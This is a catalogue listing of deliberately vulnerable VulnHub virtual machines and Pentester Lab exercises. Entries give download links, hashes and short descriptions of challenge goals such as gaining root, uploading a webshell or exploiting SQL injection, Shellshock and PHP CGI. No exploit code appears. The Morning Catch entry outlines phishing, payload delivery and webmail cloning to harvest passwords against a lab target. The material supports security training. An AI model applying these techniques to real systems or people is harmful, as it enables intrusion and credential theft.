Brainpan: 327 Jul 2015superkojimanBrainpan647 MBhttps://download.vulnhub.com/brainpan/brainpan3.zipBy using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software.TL;DR: If something bad happens, it’s not my fault. Brainpan 3 has been tested and found to work with VMware Player, VMware Fusion, and Virtual Box. Check to make sure Brainpan_III.ova has following checksums so you know your download is intact: MD5 : 170e0d8b26ab721587537fcde69087a0 SHA1: ed9ae53c556a1ce6988b3a54621dd6469c8b8aa5 Import Brainpan_III.ova into your preferred hypervisor and configure the network settings to your needs. It will get an IP address via DHCP, but it’s recommended you run it within a NAT or visible to the host OS only since it is vulnerable to attacks. Get root and get the flag. Exclusive to VulnHub!50DCAB37A3767B055E7CB09F06C739FEF25EE3545F4B51914660195FF4CF791BD35470C8Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
TopHatSec: ZorZ18 Feb 2015TopHatSecTopHatSec645 MBhttps://download.vulnhub.com/tophatsec/Zorz.ovaZORZ is another VM that will challenge your webapp skills. There are 3 separate challenges (web pages) on this machine. It should be pretty straight forward. I have explained as much as I can in the readme file:Welcome to the ZorZ VM Challenge This machine will probably test your web app skills once again. There are 3 different pages that should be focused on (you will see!) If you solve one or all three pages, please send me an email and quick write up on how you solved each challenge. Your goal is to successfully upload a webshell or malicious file to the server. If you can execute system commands on this box, thats good enough!!! I hope you have fun!You may have issues when importing to VMware. If this is the case. extract the HDD from the OVA file (using something like 7zip), and attach to a new VM.Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.05262CC7348EA21D78AFE97B3894BE96B19F01A69380AB141705921880BBA23DBF26D25FDisk Image (.ISO)LinuxEnabledAutomatically assign
ROP Primer: 0.213 Jun 2015BasROP Primer598 MBhttps://download.vulnhub.com/rop-primer/rop-primer-v0.2.ovaOur resident ROP ninjarecently gave the team a bootcamp on Return Oriented Programming. The presentation was followed by a demo walkthrough on writing a ROP exploit on a vulnerable application. Since the presentation was well received, he’s decided to make the slides available to everyone. You can view them at . We hope you enjoy it!Exclusive to VulnHub!**Release dates:**v0.1 = 04/03/2015v0.2 = 13/06/2015_Don’t forget to check the web server for more information!_840C75497F54578497A6E44DF2F960472CB14D78FD1FF7B5A7895447969FDE8CA9C06EF3Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
/dev/random: Pipe2 Oct 2015Sagi-/dev/random572 MBhttps://download.vulnhub.com/devrandom/pipe.ova3D54F3D0DCE62A00B8F152E8C1513E0743688498287762221A3DBAE0F264B9503064DBB4Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
/dev/random: Sleepy2 Oct 2015Sagi-/dev/random699 MBhttps://download.vulnhub.com/devrandom/sleepy.ovaExclusive to VulnHub!You will need to use your own Windows XP .ISO to create the target in order to attack. You can use any version of Windows to generate the image, but you need to supply it a valid Windows XP CD during the creation stage.Please see https://blog.vulnhub.com/introducing-vulninjector/ for more information.VulnInjector requires .NET framework version 4 or higher to be installed.2B8B09800A157E4E912F370F5DA03D5D9BA1A0366A53073CF4C7CF5B221313FDE6D1126FVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Pentester Lab: Play XML Entities7 Apr 2015Pentester LabPentester Lab295 MBhttps://download.vulnhub.com/pentesterlab/play_xxe.isoThis exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanismE25EF4BCF32F0C8A8763410AAB92AFDCA2825FE28A6CC30FFE2FA5F1CD6023F3ECC50C4FDisk Image (.ISO)LinuxEnabledAutomatically assign
Darknet: 1.02 May 2015q3rv0Darknet328 MBhttps://download.vulnhub.com/darknet/Darknet.rarDarknet has a bit of everything, a sauce with a touch of makeup and frustration that I hope will lead hours of fun for migraines and who dares to conquer his chambers.As the target gets used will read the file contents /root/flag.txt obviously once climbed the privileges necessary to accomplish the task. The image can be mounted with VirtualBox . The machine has DHCP active list so once automatically assign an IP network, the next step will be to identify the target and discover the / the service / s to start the game. Good luck !. If you want to send in pdf format solucionarios can do so at the following address: s3csignal [at] gmail [dot] comThe hard disk may quickly fill up if you’re using automate tools, making the virtual machine defunct.May have issues importing into VMware.1875810592F2F5354486FBFEACBA3A6C014B32B2C0E2BEEF09DCE8AA0FFE4111A6E7FA3AVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Underdist: 329 Nov 2014q3rv0Underdist532 MBhttps://download.vulnhub.com/underdist/Underdist-3.zipUnderc0de Weekend is a weekly challenge we (underc0de) are doing. The goal is to be the first to resolve it, to earn points and prizes (http://underc0de.org/underweekend.php).EnjoyAA672F50EF2FDDAE5B3B6E9B9E7B4655AA672F50EF2FDDAE5B3B6E9B9E7B4655Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Tr0ll: 224 Oct 2014MaleusTr0ll350 Mbhttps://download.vulnhub.com/tr0ll/Tr0ll2.rarThe next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! 😃Difficulty is beginner++ to intermediate. The VM should pull a valid IP from DHCP. This VM has been verified to work on VMware workstation 5, VMware player 5, VMware Fusion, and Virtual box. Virtual box users may need to enable the additional network card for it to pull a valid IP address. Special thanks to @Eagle11, @superkojiman and @leonjza for suffering through the testing and the members of #overflowsec on freenode for giving me ideas. If you have issues with the machine, feel free to contact me at @Maleus21 or maleus -Maleus www.overflowsecurity.comTr0ll2.rar = VMware, Tr0ll2_vbox.rar = VirtualBoxA6E6DDD130AC78EAC2AA1B0BF425C333F7536D74820924B5E3E148E60B7DAFCE25341A27Virtual Machine (VMware)LinuxEnabledAutomatically assign
OwlNest: 1.0.21 Sep 2014SwappageOwlNest633 MBhttps://download.vulnhub.com/owlnest/OwlNest_v1.0.2.ovaWelcome to The Owl Nest Owls are lovely but hates you 😃 and maybe after this one, you will hate them too.Notes from the author: I hope you will enjoy this game, i spent a fairly high amount of effort to build this, in an attempt to make the game funny, and provide an avarage amount of frustration to the players 😃 Even if the machine was tested, maybe there are shortcuts to reach the flag… hopefully not 😃 Expect some curve balls 😃 Special thanks goes to Barrebas for testing the VM SwappageWas used at ESC 2014 CTF769455FC71081955FBCBA3BE291E7A6D24B3C3BA430223207CF81DABF7D738B3F9238E4DVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Pandora's Box: 14 Jan 2015c0nePandora's Box497 MBhttps://download.vulnhub.com/pandora/pb0x_ova.rar027CD0F768D32D854AA6BF8573A5D742D0897CDC48220B2DB408AB557FD31D81F317DB74Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2014-6271: ShellShock25 Sep 2014Pentester LabPentester Lab20 MBhttps://download.vulnhub.com/pentesterlab/cve-2014-6271.isoQuickly created an exercise for cve-2014-6271:Source:1050E29F4A3FC7266FC5888A202F516B5F4AF13036F09DDE4A4512198F2A795B471ECC78Disk Image (.ISO)LinuxEnabledAutomatically assign
The Frequency: 17 Jan 2015strataThe Frequency296 MBhttps://download.vulnhub.com/thefrequency/TheFrequency.ovaNote, you may have issues running this depending on your host hardware.This is due to the guest OS being OpenBSD, and it being a bit more ‘picky’ on what it will run on when its been virtualized.F14F49F8F8DDF6752C9FB6F9740ECFA445798DB52BFED342DC91A05A444434ACA1514698Virtual Machine (Virtualbox - OVA)BSDEnabledAutomatically assign
The Purge: 13 Jan 2015strataThe Purge527 MBhttps://download.vulnhub.com/thepurge/ThePurge.ova0F31214DA7CCBA8B91B53764EA2FC09C5C357BC7FDCC4F9C7BD4280ECDC375C32310103FVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Persistence: 17 Sep 2014Sagi- & superkojimanPersistence553 MBhttps://download.vulnhub.com/persistence/persistence-1.0.tgzBy using this virtual machine, you agree that in no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software.TL;DR - You are about to load up a virtual machine with vulnerabilities created by hackers. If something bad happens, it’s not our fault. Persistence aims to provide you with challenging obstacles that block your path to victory. It is perhaps best described by quotes made by some famous people: “A little more persistence, a little more effort, and what seemed hopeless failure may turn to glorious success.” - Calvin Coolidge “Energy and persistence conquer all things.” - Benjamin Franklin “Persistence and resilience only come from having been given the chance to work though difficult problems.” - Gever Tulley Get a root shell and read the contents of /root/flag.txt to complete the challenge! The virtual machine will get an IP address via DHCP, and it has been tested on the following hypervisors: VMware Fusion 6 VMware Player 6 VMware Workstation 10 VirtualBox 4.3 Thanks @VulnHub for kindly hosting this challenge, and thanks to @recrudesce for testing it and providing valuable feedback!Exclusive to VulnHub!Blog post: http://blog.vulnhub.com/2014/09/competition-persistence.html0C68A77ABD4A9A35BB89340343816089D38FD05178E889FAAC75C39FA5A5B937B8117D60Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Sokar: 130 Jan 2015Rasta MouseSokar351 MBhttps://download.vulnhub.com/sokar/sokar.tar.gzExclusive to VulnHub!Blog post: http://blog.vulnhub.com/2015/01/competition-sokar.html4FB5A6054E5D1E97D73A4820CC9B6FE40DDC099FCC50A5F9D2D31EAF3918D3373AECAA33Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Knock-Knock: 1.112 Oct 2014zer0w1reKnock-Knock620 MBhttps://download.vulnhub.com/knockknock/knock-knock-1-1.ovaPretty much thought of a pretty neat idea I hadn’t seen done before with a VM, and I wanted to turn it into reality!Your job is to escalate to root, and find the flag. Since I’ve gotten a few PM’s, remember: There is a difference between “Port Unreachable” and “Host Unreachable”. DHCP is not broken 😉 Gotta give a huge shoutout to c0ne for helping to creating the binary challenge, and rasta_mouse and recrudesce for testing 😃 Also, gotta thank barrebas who was able to find a way to make things easier… but of course that is fixed with this update! 😉 MD5 – 3b6839a28b4be64bd71598aa374ef4a6 knock-knock-1-1.ova SHA1 – 0ec29d8baad9997fc250bda65a307e0f674e4180 knock-knock-1-1.ova Feel free to hit me up in #vulnhub on freenode – zer0w1re3B6839A28B4BE64BD71598AA374EF4A60EC29D8BAAD9997FC250BDA65A307E0F674E4180Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Kvasir: I17 Oct 2014Rasta MouseKvasir1.8 GBhttps://download.vulnhub.com/kvasir/kvasir1.tarKvasir 1Filename: kvasir1.ova MD5: e987e8bbe319db072246ab749912ea91 SHA1: 029a59188cd3375fa50a5115db561f8a8ef69d4a Author: Rasta Mouse Testers: Barrebas & OJ Notes to the Player As part of the challenge, Kvasir utilises LXC to provide kernel isolation. When the host VM boots, it takes can take a little bit of time before the containers become available. It is therefore advised to wait 30-60 seconds after the login prompt is presented, before attacking the VM. A few other pointers:2ED49BB79F9FB71976B6E8EEC78C7E6D9C725DA9FC6013A5EB376AF85F14287DCF18F527Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Pegasus: 116 Dec 2014KnapsyPegasus844 MBhttps://download.vulnhub.com/pegasus/pegasus.ovaPegasusWelcome to my first boot2root VM! Inspired by various CTF events I took part in and by couple cool concepts I learnt in the last couple months. Rules of engagement are simple - find a way in, escalate your privileges all the way up to the root and get the flag! As with all VMs like this, think outside the box, don’t jump to conclusions too early and “read between the lines” 😃 The VM has been tested on VMWare and VirtualBox, just import it, ensure the network is set as “Host Only” and run it. It should pick up the IP address automatically. Enjoy! 😃5046E330FF42E9ADEE0A42B63694CBFEF18B7437CA3C96F76A2E1B06F569186B63567DD5Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
SkyTower: 126 Jun 2014TelspaceSkyTower290 MBhttps://download.vulnhub.com/skytower/SkyTower.zipWelcome to SkyTower:1This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the “flag”. You will require skills across different facets of system and application vulnerabilities, as well as an understanding of various services and how to attack them. Most of all, your logical thinking and methodical approach to penetration testing will come into play to allow you to successfully attack this system. Try different variations and approaches. You will most likely find that automated tools will not assist you. We encourage you to try it our for yourself first, give yourself plenty of time and then only revert to the Walkthroughs below. Enjoy! Telspace Systems @telspacesystems4A3352251DEE384B4E4775CE35201856462801C374CF77F600ED7F4C06D683F230B71748Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Morning Catch: Phishing Industries6 Aug 2014Strategic Cyber LLCMorning Catch1.4 GBhttps://download.vulnhub.com/morningcatch/morningcatch.zipMorning Catch is a VMware virtual machine, similar to Metasploitable, to demonstrate and teach about targeted client-side attacks and post-exploitation.[On this virtual machine, you will find: a website for a fictitious seafood company, self-contained email infrastructure to receive phishes, and two desktop environments. One desktop environment is a vulnerable Linux client-side attack surface. The other is a vulnerable Windows client-side attack surface. Morning Catch uses a bleeding edge version of WINE to run a few vulnerable Windows applications AND experiment with post-exploitation tools in a fun and freely re-distributable environment. Your use of Morning Catch starts with the login screen. Boyd Jenius is the Systems Administrator and his password is ‘password’. Login as Boyd to get to the vulnerable Linux desktop. Richard Bourne is Morning Catch’s CEO and his password is also ‘password’. Login as Richard to get to the vulnerable Windows desktop. You can also RDP into the Morning Catch environment. Richard’s desktop includes the Windows’ versions of Firefox, Thunderbird, Java, and putty. Open up Thunderbird to check Richard’s email. You can send a phish to him too. This VM includes a mail server to receive email for users at the morningcatch.ph domain. Open up a terminal and find out the IP address of the VM. Make sure you relay messages through this server. Use email protected] as the address. Are you looking for some attacks to try? Here are a few staples: Spin up a malicious Java Applet and visit it as Richard. The Firefox add-on attack exploit in the Metasploit Framework is a great candidate. Or, generate an executable with your payload and run it as Richard. I’m sure he won’t mind. Morning Catch’s WINE environment runs post-exploitation payloads, to include Windows Meterpreter and Beacon, without too much trouble. Boyd’s desktop is the vulnerable Linux attack surface. Boyd has the Linux versions of Firefox, Java, and Thunderbird. Boyd also has an SSH key for the Metasploitable 2 virtual machine. Try to ssh to Metasploitable 2 as root and see what happens. Morning Catch also includes RoundCube webmail for all of its users. Use this as a target to clone and harvest passwords from. Morning Catch isn’t a replacement for a vulnerable Windows lab. It’s a safe and freely redistributable target to experiment with phishing and client-side attacks. It’s my hope that this environment will help more people experiment with and understand these attacks better.FE3BC7CD22317A40339BDC1375532C9FE5C85243FD8DB0224AD98697F1BF9DB04677219FVirtual Machine (VMware)LinuxEnabledAutomatically assign
Hell: 17 Jul 2014PeleusHell385 MBhttps://download.vulnhub.com/hell/hell.ovaWelcome to the challenge.This VM is designed to try and entertain the more advanced information security enthusiast. This doesn’t exclude beginners however and I’m sure that a few of you could meet the challenge. There is no ‘one’ focus on the machine, a range of skills such as web exploitation, password cracking, exploit development, binary examination and most of all logical thinking is required to crack the box in the intended way - but who knows there might be some short cuts! A few of the skills needed can be seen in some posts on http://netsec.ws. Otherwise enjoy the experience - remember that although vulnerabilities might not jump out at you straight away you may need to try some variations on the normal to get past the protections in place! Feel free to discuss the experience on the #vulnhub irc channel on irc.freenode.net. If you want any hints feel free to PM my nick on there (Peleus). You won’t get any, but I’ll feel all warm and fuzzy inside knowing you’re suffering. Enjoy.2B79041B5A155D1F5DEEF6CD705387DB5C04A633BFB7B8CEDAEA9B655DD272F979E2F8B7LinuxEnabledAutomatically assign
Tr0ll: 114 Aug 2014MaleusTr0ll434 MBhttps://download.vulnhub.com/tr0ll/Tr0ll.rarTr0ll was inspired by the constant trolling of the machines within the OSCP labs.The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead! Difficulty: Beginner ; Type: boot2root Special thanks to @OS_Eagle11 and @superkojiman for suffering through the testing all the way to root! The machine should pull an IP using DHCP, if you have any problems, contact me for a password to get it to working. Feedback is always appreciated! @maleus21 MD5SUM (Tr0ll.rar): 318fe0b1c0dd4fa0a8dca43edace8b20318FE0B1C0DD4FA0A8DCA43EDACE8B209C459ED10166ACAB9B7D880414A9B0FDDB51F037Virtual Machine (VMware)LinuxEnabledAutomatically assign
xerxes: 2.0.14 Aug 2014Basxerxes576 MBhttps://download.vulnhub.com/xerxes/xerxes2.0.1.tar.gz## Changelogv2.0.1: 18/08/2014 - Fixes a few typos.v2: 04/08/2014194FFB610792777F1F83F9BA7B90F4C26514215637A8792A79E65B6037AF0DDF541C25F9Virtual Machine (VMware)LinuxEnabledAutomatically assign
LAMPSecurity: CTF77 Jan 2013madirish2600LAMPSecurity709 MBhttps://download.vulnhub.com/lampsecurity/CTF7plusDocs.zipThis is the latest of several releases that are part of the LAMP Security project. The other exercises can be found under the ‘Capture the Flag’ folder. Note the PDF doesn’t include the target image. Download the CTF7plusDocs.zip to get the target image as well as the documentation (in PDF format).F5502DBC73D1BF42ED29346CABA8D4A3010722F7AC2D29919C7916BF8DF234D4F2302998Virtual Machine (VMware)LinuxEnabledAutomatically assign
LAMPSecurity: CTF83 Jun 2013madirish2600LAMPSecurity953 MBhttps://download.vulnhub.com/lampsecurity/ctf8.zipctf8.zip contains the compressed virtual machine target (ctf8.vmdk) as well as the PDF walk through instructions.The latest release fixes some issues with the user cron jobs that check their mail. Earlier versions were prone to memory leaks that would cause the virtualmachine to crash unexpectedly.0A785E840CDBF713B6AAF25E4E9F6A25F076CE00EEE8F70CEB0D18D28D0A508CA8DB4B5DVirtual Machine (VMware)LinuxEnabledAutomatically assign
CySCA: CySCA2014-in-a-Box4 Jun 2014ASDCySCA367 MBhttps://download.vulnhub.com/cysca/CySCA2014InABox.7zCySCA2014-in-a-Box is a Virtual Machine that contains most of the challenges faced by players during CySCA2014. It allows players to complete challenges in their own time, to learn and develop their cyber security skills. The VM includes a static version of the scoring panel with all challenges, required files and flags.To use CySCA2014 in a box virtual machines, players will need to have either Oracle VirtualBox or VMWare Player installed on their machines. Additionally we recommend players have at least 4GB of RAM. If you have less RAM, you can reduce the amount of RAM available to the VM down to 512MB, however it may adversely affect the speed of some of the challenges.70309E43FDCBC8180DE7DEC5573B41F4CAFA867EB5A072BE5EE7A23D36165415735B4648Virtual Machine (VMware)LinuxEnabledAutomatically assign
SecOS: 112 May 2014PaulSecSecOS599 MBhttps://download.vulnhub.com/secos/SecOS-1.tar.gzNot too tired after BSides London? Still want to solve challenges? Here is the VM I told about during my talk where you’ll have to practice some of your skills to retrieve the precious flag located here: /root/flag.txt. This VM is an entry-level boot2root and is web based.This VM is the first of a series which I’m currently creating where there will be links between all of them. Basically, each machine in the series will rely/depend on each other, so keep the flags for the next VMs. This has been tested on VirtualBox and gets its IP from the DHCP server. Moreover, if you find yourself bruteforcing, you’re doing something wrong. It is not needed and it wasn’t designed to be done this way. Instead, focus on exploiting web bugs! If you have any questions, feel free to ask me on Twitter @PaulWebSec or throw me a mail: paulwebsec(at)gmail(dot)comE8C01AB49B98926A37F79E2EA414CFC5F542F7B1DD925D7B21327CAC6524AFAB088CD7EDVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Bot Challenges: LoBOTomy5 Jun 2014bwallBot Challenges1.5 GBhttps://download.vulnhub.com/botchallenges/LoBOTomy.zipI always enjoy creating and releasing vulnerable virtual machines so readers can get a first hand feel of attacking these command and control panels without doing anything illegal. The objective of this vulnerable virtual machine is to get a root shell. The root credentials (for network configuration purposes) are root:password. These credentials are not part of a solution and it is intended that the vulnerable virtual machine be attacked remotely. You can download the LoBOTomy vulnerable virtual machine here.2E33DD5F37BE9FFE366FF579F5DC2E4DB1F04642CA917A154CF921D29C44B958C0988C74LinuxEnabledAutomatically assign
Pentester Lab: Play Session Injection14 Jul 2014Pentester LabPentester Lab99 MBhttps://download.vulnhub.com/pentesterlab/play_session_injection.isoBeginnerThis exercise covers the exploitation of a session injection in the Play framework6B459DD8BBDC10DBA6CB3D3E69B1502F619C9F16B54BCB672D9BD9341DB5CC3B2331B040Disk Image (.ISO)LinuxEnabledAutomatically assign
Flick: 18 Aug 2014LeonjzaFlick884 MBhttps://download.vulnhub.com/flick/flick.tar.gzVMware import will work, after clicking “retry” to relax the ova format.If after the retry VMware crashes, simply run “ovftool --lax flick.ova flick.vmx” to convert the ova to a VMware format and import the resultant vmx.FE2AB06A7EF99BC15E1BA3FE0E94890E488D6BE83F61F244AFEB40CA5970C7A490E40A51Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2007-1860: mod_jk double-decoding17 Apr 2014Pentester LabPentester Lab191 MBhttps://download.vulnhub.com/pentesterlab/cve-2007-1860_i386.isoBeginnerThis exercise covers the exploitation of CVE-2008-1760. This vulnerability allows an attacker to gain access to unaccessible pages using crafted requests. This is a common trick that a lot of testers miss.0A06A7C4521B4B5C842E90F2DE9E4F3CF059274CC6E03C7C5CFDDB1E181C1F15EBAF32CFDisk Image (.ISO)LinuxEnabledAutomatically assign
LAMPSecurity: CTF629 Jun 2009madirish2600LAMPSecurity425 MBhttps://download.vulnhub.com/lampsecurity/ctf6.zipThe LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available (http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/).These exercises can be used for training purposes by following this documentation. Alternatively you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.36208CE8AF7EF9A04541FCD8EF2E8D7AABEE9A3017D576C54A3FBD2E0D6DA10F42332C83Virtual Machine (VMware)LinuxEnabledAutomatically assign
Pentester Lab: Introduction to Linux Host Review22 Oct 2012Pentester LabPentester Lab184 MBhttps://download.vulnhub.com/pentesterlab/linux_host_review_i386.isoBeginnerThis exercice explains how to perform a Linux host review, what and how you can check the configuration of a Linux server to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-Mysql-PHP (LAMP) server used to host a blog.A78AC9FE2B2081370108B23CBE9FCDB048AAF03CB8F57E2018FEC132A45C276F21EEBF6FDisk Image (.ISO)LinuxEnabledAutomatically assign
LAMPSecurity: CTF510 May 2009madirish2600LAMPSecurity1017 MBhttps://download.vulnhub.com/lampsecurity/ctf5.zipThis is the fifth capture the flag exercise. It includes the target virtual virutal machine image as well as a PDF of instructions. The username and password for the targer are deliberately not provided! The idea of the exercise is to compromise the target WITHOUT knowing the username and password. Note that there are other capture the flag exercises. If you like this one, download and try out the others. If you have any questions e-mail me at justin AT madirish DOT netThe LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available (http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/). These exercises can be used for training purposes by following this documentation. Alternatively you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.159A25442061DB6F82F1B873F04E2375E629F854BB1A823F9611DB5FA720174DE3AE2E69Virtual Machine (VMware)LinuxEnabledAutomatically assign
Pentester Lab: From SQL injection to Shell13 Sep 2012Pentester LabPentester Lab169 MBhttps://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.isoBeginnerThis exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system.9221158D81B826034B3B8E3D3FC8EC68F1BE03CACE56F7951AC5A91BF43353289BE90813Disk Image (.ISO)LinuxEnabledAutomatically assign
Command Injection ISO: 17 Apr 2014Pentester AcademyCommand Injection ISO1.5 GBhttps://download.vulnhub.com/commandinjectioniso/Command_Injection_OS.zipWe’ve packaged 10 real world applications into an Ubuntu Desktop based ISO. These applications are vulnerable to command injection attacks which you will need to find and exploit. Please note that not all applications are on port 80 😃All the best!Username: securitytubePassword: 12332135747567C885BC72080F1107D3205A5780FAA5DED0F892DC786D4463DE8694CC82577A61LinuxEnabledAutomatically assign
Pentester Lab: PHP Include And Post Exploitation19 Apr 2012Pentester LabPentester Lab172 MBhttps://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation_i386.isoBeginnerThis exercice describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post exploitation tricks. PHP include Reverse shell with netcat TCP redirection with socatA5413A548CF80D56D117C0C3AB47CCCADE23E5B7A92FC69F41851C43B6398CFB092DDA72Disk Image (.ISO)LinuxEnabledAutomatically assign
LAMPSecurity: CTF410 Mar 2009madirish2600LAMPSecurity491 MBhttps://download.vulnhub.com/lampsecurity/ctf4.zipUpdated to set default runlevel to 3 (no X windows) and fixed DHCP.This is the fourth capture the flag exercise. It includes the target virtual virutal machine image as well as a PDF of instructions. The username and password for the targer are deliberately not provided! The idea of the exercise is to compromise the target WITHOUT knowing the username and password. Note that there are other capture the flag exercises. If you like this one, download and try out the others. If you have any questions e-mail me at justin AT madirish DOT net. The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available (http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/). These exercises can be used for training purposes by following this documentation. Alternatively you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.8DBE28D5F886BBDE6103317C4B1C195F3680FB770282ECDD90168C484E61B635079E6C48Virtual Machine (VMware)LinuxEnabledAutomatically assign
Pentester Lab: From SQL injection to Shell: PostgreSQL edition7 Dec 2012Pentester LabPentester Lab161 MBhttps://download.vulnhub.com/pentesterlab/from_sqli_to_shell_pg_edition_i386.isoBeginnerThis exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system. If you didn’t go through From SQL injection to shell, you should start there and move to this exercise later.D6C1AA6F437ED2D5C0F66CCB2BC896B0A88E1E1217D2D3743F7737BBA7C47CE68125BCC3Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2012-1823: PHP CGI29 May 2012Pentester LabPentester Lab172 MBhttps://download.vulnhub.com/pentesterlab/cve-2012-1823.isoBeginnerThis exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution. Exploiting CVE-2012-1823 Details on PHP security features302299AB1AFDCAB3BB26D88D0D3FF9C4ED9C2E8A778AF226D6908EB560ACF5038B4F88E5Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2012-2661: ActiveRecord SQL injection12 Jun 2012Pentester LabPentester Lab330 MBhttps://download.vulnhub.com/pentesterlab/cve-2012-2661_i386.isoAdvancedThis exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database.45F7408ED83F5C152CEE983134C2343E4C4DA9968C1D4C07A462CD1AF48EC350B9B87A57Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Rack Cookies and Commands Injection2 Oct 2012Pentester LabPentester Lab317 MBhttps://download.vulnhub.com/pentesterlab/rack_cookies_and_commands_injection_i386.isoIntermediateAfter a short brute force introduction, this exercice explains the tampering of rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain commands execution.3AB2F16009BFE8F37AA45EDA636E5FE8E5C8DD2C48B608AACF3BAC8F291872092BFBACE2Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability7 Dec 2012Pentester LabPentester Lab170 MBhttps://download.vulnhub.com/pentesterlab/cve-2008-1930_i386.isoBeginnerThis exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a Wordpress installation.D5C658FE22878E9EEECDB3AE33EE8B624890C6595FD2B8B0348CE17D3DD926DA9DC42415Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2012-6081: MoinMoin code exec24 Apr 2013Pentester LabPentester Lab162 MBhttps://download.vulnhub.com/pentesterlab/cve-2012-6081_i386.isoAdvancedThis exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian’s wiki and Python documentation websiteF860AA584C355F5E91E21E2519AB4A74EFA569E0183D5668A163784AD7279BAB38DF4DF9Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: XSS and MySQL FILE29 Jan 2014Pentester LabPentester Lab178 MBhttps://download.vulnhub.com/pentesterlab/xss_and_mysql_file_i386.isoBeginnerThis exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator’s cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it.C9C7A31AB9BF79B82B72B58BB0A3A6578B8D7019194A14DADC16A605D9731A080E9E0C6ADisk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Web For Pentester26 Mar 2013Pentester LabPentester Lab172 MBhttps://download.vulnhub.com/pentesterlab/web_for_pentester_i386.isoBeginnerThis exercise is a set of the most common web vulnerabilities:More information: http://web-for-pentester.pentesterlab.com/71F87B676AD51B541AA23EABB95F9A57375080138AC2AD438FA66F0088A16A6D66C1F5A6Disk Image (.ISO)LinuxEnabledAutomatically assign
